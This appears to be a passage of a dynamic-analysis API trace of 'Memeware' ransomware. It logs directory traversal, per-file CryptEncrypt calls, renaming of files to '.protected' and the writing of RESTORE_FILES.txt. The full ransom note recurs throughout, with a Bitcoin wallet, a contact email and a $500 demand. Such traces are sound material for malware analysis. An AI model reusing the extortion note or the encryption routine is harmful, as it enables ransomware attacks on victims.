\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.143] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.144] lstrlenA (lpString="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") returned 684 [0090.144] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.144] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.144] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.144] CloseHandle (hObject=0xd8) returned 1 [0090.144] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="Windows") returned -1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="Program Files") returned -1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="Program Files (x86)") returned -1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="$Recycle.bin") returned 1 [0090.144] lstrcmpiW (lpString1="MS Project", lpString2="System Volume Information") returned -1 [0090.144] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project") returned 70 [0090.144] lstrcmpW (lpString1="MS Project", lpString2=".") returned 1 [0090.145] lstrcmpW (lpString1="MS Project", lpString2="..") returned 1 [0090.145] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned 72 [0090.145] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.145] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.145] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.145] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.145] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.145] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.145] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\.") returned 72 [0090.145] lstrcmpW (lpString1=".", lpString2=".") returned 0 
[0090.146] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.146] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.146] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.146] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.146] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.146] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.146] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\..") returned 73 [0090.146] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.146] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.146] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0090.146] lstrcmpiW (lpString1="14", lpString2="Windows") returned -1 [0090.146] lstrcmpiW (lpString1="14", lpString2="Program Files") returned -1 [0090.146] lstrcmpiW (lpString1="14", lpString2="Program Files (x86)") returned -1 [0090.146] lstrcmpiW (lpString1="14", lpString2="$Recycle.bin") returned 1 [0090.146] lstrcmpiW (lpString1="14", lpString2="System Volume Information") returned -1 [0090.146] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14") returned 73 [0090.146] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0090.146] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0090.146] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*") returned 75 [0090.146] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\*", 
lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0090.147] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.147] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.147] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.147] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.147] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.147] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\.") returned 75 [0090.147] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.147] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.147] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.147] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.147] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.147] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.147] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.147] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\..") returned 76 [0090.147] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.147] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.147] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0090.147] lstrcmpiW (lpString1="1033", lpString2="Windows") returned -1 [0090.147] lstrcmpiW (lpString1="1033", lpString2="Program Files") returned -1 [0090.147] lstrcmpiW (lpString1="1033", lpString2="Program Files (x86)") returned -1 [0090.147] lstrcmpiW (lpString1="1033", lpString2="$Recycle.bin") returned 1 [0090.148] 
lstrcmpiW (lpString1="1033", lpString2="System Volume Information") returned -1 [0090.148] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033") returned 78 [0090.148] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0090.148] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0090.148] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*") returned 80 [0090.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0090.149] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.149] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0090.149] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0090.149] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.149] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.149] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\.") returned 80 [0090.149] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.149] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.149] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.149] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0090.149] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0090.149] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.149] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.150] 
wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\..") returned 81 [0090.150] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.150] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.150] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="Windows") returned -1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="Program Files") returned -1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="Program Files (x86)") returned -1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="$Recycle.bin") returned 1 [0090.150] lstrcmpiW (lpString1="Global.MPT", lpString2="System Volume Information") returned -1 [0090.150] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 89 [0090.150] StrStrIW (lpFirst="Global.MPT", lpSrch=".protected") returned 0x0 [0090.150] lstrcmpW (lpString1="Global.MPT", lpString2="RESTORE_FILES.txt") returned -1 [0090.150] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.150] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.150] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 89 [0090.150] StrStrW (lpFirst="Global.MPT", lpSrch=".txt") returned 0x0 [0090.150] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 89 [0090.151] StrStrW (lpFirst="Global.MPT", lpSrch=".rar") returned 0x0 [0090.151] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT") returned 89 [0090.151] StrStrW (lpFirst="Global.MPT", lpSrch=".zip") returned 0x0 [0090.151] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.157] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.158] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.158] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.158] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.168] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.168] CloseHandle (hObject=0x154) returned 1 [0090.168] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.protected") returned 99 [0090.168] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt.protected")) returned 1 [0090.169] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0090.169] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0090.169] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\RESTORE_FILES.txt") returned 96 [0090.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0090.170] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.170] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0090.170] lstrlenA (lpString="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") returned 684 [0090.170] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0090.170] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.170] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.170] CloseHandle (hObject=0x150) returned 1 [0090.171] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0090.171] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0090.171] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\RESTORE_FILES.txt") returned 91 [0090.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0090.171] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.171] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0090.172] lstrlenA (lpString="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") returned 684 [0090.172] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0090.172] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.172] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0090.172] CloseHandle (hObject=0x14c) returned 1 [0090.173] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0090.173] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0090.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\RESTORE_FILES.txt") returned 88 [0090.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0090.174] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0090.174] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0090.174] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0090.174] WriteFile (in: hFile=0xd8, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0090.174] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0090.174] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0090.174] CloseHandle (hObject=0xd8) returned 1 [0090.175] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="Windows") returned -1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="Program Files") returned -1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="Program Files (x86)") returned -1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="$Recycle.bin") returned 1 [0090.175] lstrcmpiW (lpString1="Network", lpString2="System Volume Information") returned -1 [0090.175] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network") returned 67 [0090.175] lstrcmpW (lpString1="Network", lpString2=".") returned 1 [0090.175] lstrcmpW (lpString1="Network", lpString2="..") returned 1 [0090.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*") returned 69 [0090.175] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0090.175] lstrcmpiW (lpString1=".", 
